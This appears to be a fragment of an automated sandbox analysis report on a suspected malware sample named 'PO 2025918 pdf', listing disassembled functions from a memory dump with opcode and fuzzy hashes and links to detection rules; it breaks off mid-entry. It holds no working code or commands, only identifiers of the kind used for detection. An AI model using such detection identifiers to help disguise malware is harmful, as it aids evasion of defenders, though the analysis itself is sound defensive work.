                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fa4bda975e4a12fe61ec2d098660d6b5442500cfb6882c9c17adf04fa0e39e2
                                                                                • Instruction ID: c1407709326fc31ac60b80d14b1f230af0ed27d9fba3ea88fed0c2becdaf6d07
                                                                                • Opcode Fuzzy Hash: 0fa4bda975e4a12fe61ec2d098660d6b5442500cfb6882c9c17adf04fa0e39e2
                                                                                • Instruction Fuzzy Hash: E4F0B4319166D19FEF32CB5CCF44B21BBDC9B01660F0A4D6AD54A8F602DF24D882C650
                                                                                Function 01750115 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 01b9924cb9aabc61f555e457f891b7aac205141f86539e6f6b23111f5b339126
                                                                                • Instruction ID: 3522b4f1a69afd20a67342829d2b0b6ae7342d8bcf3cf153a12abc0f709f21cf
                                                                                • Opcode Fuzzy Hash: 01b9924cb9aabc61f555e457f891b7aac205141f86539e6f6b23111f5b339126
                                                                                • Instruction Fuzzy Hash: 58F05C2645A6C017CF726B3C74583DDFF55A752324F2A1489FCE05B209D6B48883C366
                                                                                Function 016CC5ED Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8244ed67a58bfc41d27f6319776b9e53017587f6b0abc973c8ed0135764b40cc
                                                                                • Instruction ID: 8409944602ae99a869f28d7a7210038c0891b979b683b11f349586cec9365f46
                                                                                • Opcode Fuzzy Hash: 8244ed67a58bfc41d27f6319776b9e53017587f6b0abc973c8ed0135764b40cc
                                                                                • Instruction Fuzzy Hash: 43F0BE725116719BE3229A2ECA48B31BBD8DB45EA1F08942DD40A87612C364E881CA50
                                                                                Function 016D2619 Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                • Instruction ID: 8284b21560537c2436abda9a33af392b1cc7531b98607fe07ce9a504c8e7e1eb
                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                • Instruction Fuzzy Hash: 93E0D8327006412BE7219E598CD0F57776FEFD2B10F04407DB6045F252CAE2DC0986A8
                                                                                Function 01726030 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                • Instruction ID: cf7ac776eb74f4b2bc350df8d8e57404245a92bae6182d8bf0dc0eee92a029a9
                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                • Instruction Fuzzy Hash: EFF08C721002149FE3218F09D840F62B7B8EB05364F41C06AEA098B161D339EC41DBA4
                                                                                Function 01690710 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                • Instruction ID: 98a4c2fac84dbc4b5503c15a18e8499c217cfe26442037cfd1601272fb667497
                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                • Instruction Fuzzy Hash: ECF0E53A204741DBDF16DF19D840AA97BECFB45360F040094F8468B301E732E982CF94
                                                                                Function 016C49D0 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                • Instruction ID: 313a3c1cc60a338fa8f57f283d775d4bc20945c4ab626bb62ac31f6d89a28064
                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                • Instruction Fuzzy Hash: FBE0D8322441C5ABD3219A9D8C10B7677A6EBD0FA0F15042DEA028B258DF70DC41C7DC
                                                                                Function 0173678E Relevance: .0, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                • Instruction ID: 2a9ae135abf400701b33720073b246ab3517d1a290dfbd2517b1cd792ade3dc5
                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                • Instruction Fuzzy Hash: 19E0DF32A00110BBDB22A7998D01F9ABEADEB90EA0F450058B602E7090E530EE00DAA0
                                                                                Function 016925E0 Relevance: .0, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9ad3a8bf46fba0923b99c62818a6d4a4934978ab4fcdcfab38397d576a0f93c8
                                                                                • Instruction ID: a9b200d42c15331589a1b2ca17c0928ae923c337d2879985fbaa84f2457d02f2
                                                                                • Opcode Fuzzy Hash: 9ad3a8bf46fba0923b99c62818a6d4a4934978ab4fcdcfab38397d576a0f93c8
                                                                                • Instruction Fuzzy Hash: D5E09272100594ABC721BB29DD11F8A77ABEF61364F11451DB15557190CB30AC11C7C8
                                                                                Function 01714000 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                • Instruction ID: 3e02e5e610b8d0e8e32b791e8fd760c86580f20c45349aa4477c411c8fd3579c
                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                • Instruction Fuzzy Hash: 41E0C2343003058FE715CF1EC050B62BBB6BFD5B10F28C0A8A9498F209EB32E882CB40
                                                                                Function 016CCA38 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3f1eaf07b1dff66a8708616b715c731c0725d726c1c710631473df82521cda41
                                                                                • Instruction ID: 2a7f3a5f9ca75fdad2dc186ab82163f280c25a9e56a7f1dad8e9d9efedfecbcd
                                                                                • Opcode Fuzzy Hash: 3f1eaf07b1dff66a8708616b715c731c0725d726c1c710631473df82521cda41
                                                                                • Instruction Fuzzy Hash: 17D02B324C54306ACB39E15CBC08FF73A5AEB40B20F018868FA0CD2011D524CC8187C8
                                                                                Function 0168823B Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                • Instruction ID: 1fa28b9f7e24165434215248931c88d16d07e0d2e12768ebb3ffab2811b48ed1
                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                • Instruction Fuzzy Hash: FCE0C231801A20EFDB323F15DC20F5176AAFF94B10F508A2DE0820B1A487B0AC82CB88
                                                                                Function 01692050 Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cbb9bda0c965efeafd2c67c0f9d9f2012daceeb4638dd24e427c0ff4d76d0df
                                                                                • Instruction ID: 33c00d1a642b8ab288b02eaf8ef51c97bf57052853bd75c38521ccffd2de5bf9
                                                                                • Opcode Fuzzy Hash: 0cbb9bda0c965efeafd2c67c0f9d9f2012daceeb4638dd24e427c0ff4d76d0df
                                                                                • Instruction Fuzzy Hash: 89E0C2322004A07BC711FB5DDD10F4A73AFEFA5370F104129F15187690CA20AC01C7D8
                                                                                Function 016C8A90 Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                • Instruction ID: 121fa79b74412cd06fd878709dc6bf57c6c62bebd8e36fd968b4099e449ba430
                                                                                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                • Instruction Fuzzy Hash: 71E08633111A1887C728EE5CD911B7277A8FF45B20F09463EAA1347791C634E944C794
                                                                                Function 016E6AA4 Relevance: .0, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                • Instruction ID: 4c61a1e79456c8753729ead995f4dbabcda257222251726ea1eea4f18b5feb11
                                                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                • Instruction Fuzzy Hash: 6CD05E36911A50AFC3329F1BEE04C13FBFAFBD4A10705062EA54683A20C770AC06CBA0
                                                                                Function 016CE59C Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                • Instruction ID: 37c1778d52053a009944bc5bf797ae127d5f2e477742ee443128c7bd81e50fa2
                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                • Instruction Fuzzy Hash: 1DD0A732504610AFD732AA1CFC00FC373D9BB48720F050459B009C7151C360AC41CA44
                                                                                Function 0170E908 Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                • Instruction ID: fd02dbb6349a062aed8f6bfa9b645dbcd085fdb63a3be737acb6c51ba00d2f12
                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                • Instruction Fuzzy Hash: 98E0EC35960784EFDF13DF99CA40F5AFBFABB94B40F150458A1085B660C625AD01CB40
                                                                                Function 0168A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                • Instruction ID: 507b413c65391510e30a516e3e81d9559493f9ad94fbc47a26a84a9d6ee84741
                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                • Instruction Fuzzy Hash: D9D02232212030A7CB2866956C00F63B906AB80A94F0A012E380A93A00C1048C43C6E0
                                                                                Function 016CA830 Relevance: .0, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                • Instruction ID: 12349ed6c80d33a110919ac5cff4fc78ec2cdf44794fc856d56f9cffcf7649a8
                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                • Instruction Fuzzy Hash: BFD012371D054DBBCB119F66DC01F957BAAE764BA0F444020B505875A0C63AE950D984
                                                                                Function 016CCA24 Relevance: .0, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3343d1c9b93ca9425ccd29bc3d60f43eb4cae73e63d86b46b553d831791e2229
                                                                                • Instruction ID: b0075cb0c798e7db8b30030cf9c331e26dabbc5c34edb15f9d2bd7a3e577817c
                                                                                • Opcode Fuzzy Hash: 3343d1c9b93ca9425ccd29bc3d60f43eb4cae73e63d86b46b553d831791e2229
                                                                                • Instruction Fuzzy Hash: FBD05230A41202EBDF2BCF88CE14A3EBAB1EB10B40B94006CFA0192220E328DC028A00
                                                                                Function 016A02A0 Relevance: .0, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction ID: 6f0233826bb4a4f7482f120f74ebc74e27d367c1b6753e1d75716541176ac13c
                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction Fuzzy Hash: E6D09235212A80CFD62A8B0DC9A4B1633A4BB45A44FC14490E501CBB22D728D940CE00
                                                                                Function 016CC700 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                • Instruction ID: 1ea0a8f021bf6599a2e6bd7cf9a3933f58f229224c4d82b6ab89f9170219a06a
                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                • Instruction Fuzzy Hash: 5AC01232150644AFC7119A95CD01F0177AAE798B40F400021F20547670C531EC10DA44
                                                                                Function 016B0310 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction ID: df967131ed8df3e1bd40a224c11ac22fc82bcf0fca52918fa936e8b3caedd114
                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction Fuzzy Hash: 8BD01236100249EFCB11DF41C890D9B7B3BFBD8710F108019FD19076108A31ED62DB50
                                                                                Function 01690750 Relevance: .0, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                • Instruction ID: 18034b5f5b9d72f35d236eec745c8ea3b89080c82d352b34b6452e916e0ccc12
                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                • Instruction Fuzzy Hash: 61C002756019418BCF15DA59D694A4577E4B754740F151890E8058B721E624E811CA10
                                                                                Function 016D4340 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                                • Instruction ID: 40bcdfbd4ea1c420813955d6001ae75c38ceeaf954177ef336399aaa7c61bab8
                                                                                • Opcode Fuzzy Hash: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                                • Instruction Fuzzy Hash: 5C900231606800129140755C4C885474049A7E0301B55C111E4424A54DCA148A565361
                                                                                Function 016D4650 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                                • Instruction ID: 82ef257d0559fb3a29e9a6cd60a2fe59b7c60188afab8968266e96ae2a3277ec
                                                                                • Opcode Fuzzy Hash: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                                • Instruction Fuzzy Hash: D4900261602500424140755C4C084076049A7E1301395C215A4554A60DC61889559369
                                                                                Function 016D2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                                • Instruction ID: 67a364fe8e14ed5632886f95e86cd4f5d87f07dfc5b7f13aaae13740efc2225f
                                                                                • Opcode Fuzzy Hash: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                                • Instruction Fuzzy Hash: B190023120644842D140755C4808A47005997D0305F55C111A4064B94ED6258E55B761
                                                                                Function 016D2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                                • Instruction ID: c3a34b5f254555c36356b5217c86ff3a484bd86302627ff31b4562c86115bac1
                                                                                • Opcode Fuzzy Hash: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                                • Instruction Fuzzy Hash: B090023120240802D180755C480864B004997D1301F95C115A4025B54ECA158B5977A1
                                                                                Function 016D2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                                • Instruction ID: 232d4d706690b32cc14004843a87c5bee3c5946ef354eaa3bde78fae63c9391a
                                                                                • Opcode Fuzzy Hash: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                                • Instruction Fuzzy Hash: 4390023160640802D150755C4818747004997D0301F55C111A4024B54EC7558B5577A1
                                                                                Function 016D2B80 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                                • Instruction ID: 040f88c164f44f4adfd2eb92ce1a59921d1d4e6edc326dfb892bbf0a81c6ffa9
                                                                                • Opcode Fuzzy Hash: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                                • Instruction Fuzzy Hash: F790023120240802D104755C4C08687004997D0301F55C111AA024B55FD66589917231
                                                                                Function 016D2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                                • Instruction ID: f6fe2125959c0eff1d856123e2189a418f0e19c6616de5229c81eea04104cfbd
                                                                                • Opcode Fuzzy Hash: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                                • Instruction Fuzzy Hash: E3900225222400020145B95C0A0850B0489A7D6351395C115F5416A90DC62189655321
                                                                                Function 016D2AD0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
